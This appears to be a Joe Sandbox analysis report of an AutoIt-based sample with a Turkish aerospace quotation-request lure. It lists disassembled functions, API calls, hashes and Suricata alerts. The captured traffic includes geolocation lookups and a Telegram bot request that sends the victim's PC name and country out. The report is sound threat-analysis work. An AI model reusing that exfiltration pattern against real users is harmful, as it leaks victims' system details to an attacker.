Instruction ID: ec86fb9c13fe489d4b01d767d9a661e99eff2859342f50f692126fa1afbd622c
Opcode Fuzzy Hash: 83338ad26ebfb1bd58dcf6108479f56a03d7aec42cc855bb3123fa2d856558b9
Instruction Fuzzy Hash: 1031E571408300AAC325FB10EC49BEBB7D8AF51714F04455EF5A983091EB709759CBC6

Function 002131EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0021327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00213287

Strings

Combobox, xrefs: 00213249

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 0e9cc93ab56e8944c0937db14d8f94670ffabfcd6d87fa33fd9c0b9744014f9d
Instruction ID: efaabf2121d266270f4f2627cc7e08b30ea0ebbe9974075fa40310fdcafc242d
Opcode Fuzzy Hash: 0e9cc93ab56e8944c0937db14d8f94670ffabfcd6d87fa33fd9c0b9744014f9d
Instruction Fuzzy Hash: 4A1182713202097FFF25EE54DC85EFB37ABEBA8364F104125F91897290D6719DA18B60

Function 00213710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0018600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0018604C
Part of subcall function 0018600E: GetStockObject.GDI32(00000011), ref: 00186060
Part of subcall function 0018600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0018606A

GetWindowRect.USER32(00000000,?), ref: 0021377A
GetSysColor.USER32(00000012), ref: 00213794

Strings

static, xrefs: 00213757

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: d89ce050cd387b607e15e6660d21e8ef43946827e4b055d62b0225716877ec3f
Instruction ID: d1307b332fddd44192a071df9a073958a4943e3d6f42b57e2677a48a7ea39b27
Opcode Fuzzy Hash: d89ce050cd387b607e15e6660d21e8ef43946827e4b055d62b0225716877ec3f
Instruction Fuzzy Hash: 77116AB262020AAFDF11DFA8CC49EEA7BF9FB18314F104514F955E2250D734E9619B50

Function 001FCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 001FCD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 001FCDA6

Strings

<local>, xrefs: 001FCD66

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: a7177ca8c53e785f7c9afac563cbe31f186c043e5f4ec396a4b162e9b88cb2d8
Instruction ID: ed50aeb23afd505cff7b1eab9c0e02b624120a172022ec4fc702a57b20433750
Opcode Fuzzy Hash: a7177ca8c53e785f7c9afac563cbe31f186c043e5f4ec396a4b162e9b88cb2d8
Instruction Fuzzy Hash: 1111CA7564563D79D7384BA68C49FFBBE5CEF127A4F104225B20983080D7705841E6F0

Function 00213429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 002134AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002134BA

Strings

edit, xrefs: 0021348F

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 7be12363f0030d5cff690756ae5e8bc3ce6f5020947517a83e7950a31199ee2f
Instruction ID: 122bf57dfd80b90fdcceefc6ef6bbd03c09cdd13ceeee6852415dee344026806
Opcode Fuzzy Hash: 7be12363f0030d5cff690756ae5e8bc3ce6f5020947517a83e7950a31199ee2f
Instruction Fuzzy Hash: 1F118F71120209AFEB219E64EC44AFB37ABEB25374F604324F965931D0C771DDA19B54

Function 001E6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD

CharUpperBuffW.USER32(?,?,?), ref: 001E6CB6
_wcslen.LIBCMT ref: 001E6CC2

Strings

STOP, xrefs: 001E6CBC, 001E6CC1

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 3cef5ec0a1bdd8b46ac681e2fb513c9ad3ba7cc522364b65f152bf4a2cb51cfe
Instruction ID: 3f2b8da5efa3da4ebba664c69fab3e084acc30c6dbdf959e6b81394fccb0fa8e
Opcode Fuzzy Hash: 3cef5ec0a1bdd8b46ac681e2fb513c9ad3ba7cc522364b65f152bf4a2cb51cfe
Instruction Fuzzy Hash: 5C01C4326109A68BCB20AFFEDC909BF77A5FB717907E10529E89297191EB31D940C750

Function 001E1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD

Part of subcall function 001E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 001E3CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 001E1C46

Strings

ComboBox, xrefs: 001E1BE5
ListBox, xrefs: 001E1C10

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: de106258ebe5c59c0864b93e90e84fa3669a9d6e165ff4a968e5791240877d58
Instruction ID: 9364dbeaa91b819245975e69456bbbab4c133cac29b61f5d384457a47fa55aa6
Opcode Fuzzy Hash: de106258ebe5c59c0864b93e90e84fa3669a9d6e165ff4a968e5791240877d58
Instruction Fuzzy Hash: AB01A7757815487BCB08FB91D9559FF77A89F22340F240019B416B7282EB319F189BB1

Function 001E1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD

Part of subcall function 001E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 001E3CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 001E1CC8

Strings

ComboBox, xrefs: 001E1C69
ListBox, xrefs: 001E1C94

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 4ebec9d5d63e3ff142424679dba9fb78871ab0a420f60391088b0cbcd5645a01
Instruction ID: bd74d4d0974b0d11269f6ef7ab4f83b6bdaefae2bfb129b63e93917e9bdbc3f6
Opcode Fuzzy Hash: 4ebec9d5d63e3ff142424679dba9fb78871ab0a420f60391088b0cbcd5645a01
Instruction Fuzzy Hash: B401D67568155877CB08FBA1CA05AFE73AC9B22340F680015B812B7282EB319F18DB71

Function 00218172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00253018,0025305C), ref: 002181BF
CloseHandle.KERNEL32 ref: 002181D1

Strings

\0%, xrefs: 0021818A

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0%
API String ID: 3712363035-245754994
Opcode ID: 2e33d2152d152e6883c23f9b48c7d46a8b83cf0151e870ef05527e3976c7fbb8
Instruction ID: 979529f3ee274ad5b7675172cfb1f5be331c51682be7bb2362696d3db0a35830
Opcode Fuzzy Hash: 2e33d2152d152e6883c23f9b48c7d46a8b83cf0151e870ef05527e3976c7fbb8
Instruction Fuzzy Hash: 46F05EB6650300BAE720AB65BC49FB73A5CEB197A2F005460FB08D51E2D6768E1482FC

Function 0020747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00207493
_wcslen.LIBCMT ref: 002074B9

Strings

3, 3, 16, 1, xrefs: 00207483

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: c4b1202cba776ed1d2131395a1bd55ac3ade88fbf62b943f2222a801cfa17936
Instruction ID: 8efe590b71e3e839715ddf10ff0b0365761797353908a758741696d31a9461df
Opcode Fuzzy Hash: c4b1202cba776ed1d2131395a1bd55ac3ade88fbf62b943f2222a801cfa17936
Instruction Fuzzy Hash: 7EE02B0AA2436111D3311A799CC197F96ADDFDA750710182BF981C22A7EBD49DB193A0

Function 001E0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001E0B23

Strings

AutoIt, xrefs: 001E0B17
Error allocating memory., xrefs: 001E0B1C

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 656e78c6f1b494dd3028eb5ff2bbdbf1463ca7bfa24e799b8512f2f5a552ffc6
Instruction ID: 25097994f18ce62e2512420bf80f3ee03dcfb502b9f01b394ae05490114e360e
Opcode Fuzzy Hash: 656e78c6f1b494dd3028eb5ff2bbdbf1463ca7bfa24e799b8512f2f5a552ffc6
Instruction Fuzzy Hash: C7E0D83528431837D21437947C03FC97AC49F26F20F20042AF788954C38BD224A006E9

Function 001A0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0019F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,001A0D71,?,?,?,0018100A), ref: 0019F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0018100A), ref: 001A0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0018100A), ref: 001A0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 001A0D7F

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 2bf75f20d9c7e9109b051145c5be69d05b8a64e8f52b65f6854ad0dcc69c23fd
Instruction ID: 13236b64df556c197fd6eee0de881b25f3b3090e3ff3f2fdbf3b7898d515b6d6
Opcode Fuzzy Hash: 2bf75f20d9c7e9109b051145c5be69d05b8a64e8f52b65f6854ad0dcc69c23fd
Instruction Fuzzy Hash: 56E092782007018BD3719FF8E5083827BE0AF29780F00896DE896C6751DBF4E4888B91

Function 0019E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0019E3D5

Strings

8%%, xrefs: 0019E3CA
0%%, xrefs: 0019E3B5

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%%$8%%
API String ID: 1385522511-3448817212
Opcode ID: 1a64c023a978ec8075bd2ac067a42d9211d40583e6d1f4efee73f145acc76fdf
Instruction ID: fe2e9fe55c2f5ba70678d855d8265024ed3195dde859e50f41574f4a3f4627c9
Opcode Fuzzy Hash: 1a64c023a978ec8075bd2ac067a42d9211d40583e6d1f4efee73f145acc76fdf
Instruction Fuzzy Hash: E5E08635434B10CBCE0DDF18FA59A983395FB3B321B911169E5128B1D1BB316989865D

Function 001DD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 001DD220

Strings

X64, xrefs: 001DD2A8
%.3d, xrefs: 001DD22B

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 0b88279c70fc5a1e3d2c46249215503bc18c46fc10cc663af2eb6b608330e302
Instruction ID: 3bbee54275e67ac1b4babf491bc15a6b9d89377e663a576b7bba5f635c2ebbd1
Opcode Fuzzy Hash: 0b88279c70fc5a1e3d2c46249215503bc18c46fc10cc663af2eb6b608330e302
Instruction Fuzzy Hash: D3D012A5848108FACF589AD0EC498FAB37CAB28341F618453FC06D1140D734C5096761

Function 00212322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0021232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0021233F

Part of subcall function 001EE97B: Sleep.KERNEL32 ref: 001EE9F3

Strings

Shell_TrayWnd, xrefs: 00212325

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 15a195ebc6957936d2533bdfd8c7ae9d7bfecaa6acae0c8e5850965955037c45
Instruction ID: baeef4556fdad8d20d9829f3c1d9263330f569e72fe46ed5167cec1c85200c23
Opcode Fuzzy Hash: 15a195ebc6957936d2533bdfd8c7ae9d7bfecaa6acae0c8e5850965955037c45
Instruction Fuzzy Hash: C4D0223A3D0340BBE26CB770EC0FFCABA489B20B00F2089027305AA0D0CDF0A800CB00

Function 00212356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0021236C
PostMessageW.USER32(00000000), ref: 00212373

Part of subcall function 001EE97B: Sleep.KERNEL32 ref: 001EE9F3

Strings

Shell_TrayWnd, xrefs: 00212365

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 3938f8d426ef5182c1f4e9b5bc5398f37347c7777902e5c3a5b878563d7880c2
Instruction ID: 2d2eb0fa7ced52cbce2d3f792fed6549575747efd896568ea69a908aae3165e8
Opcode Fuzzy Hash: 3938f8d426ef5182c1f4e9b5bc5398f37347c7777902e5c3a5b878563d7880c2
Instruction Fuzzy Hash: 38D0A9363C03407AE268A770EC0FFCAA6489B21B00F2089027201AA0D0C9E0A800CA04

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2018/12/2024%20/%2007:04:25%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49709 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49706 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49710 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49708 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49716 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49720 -> 104.21.67.152:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
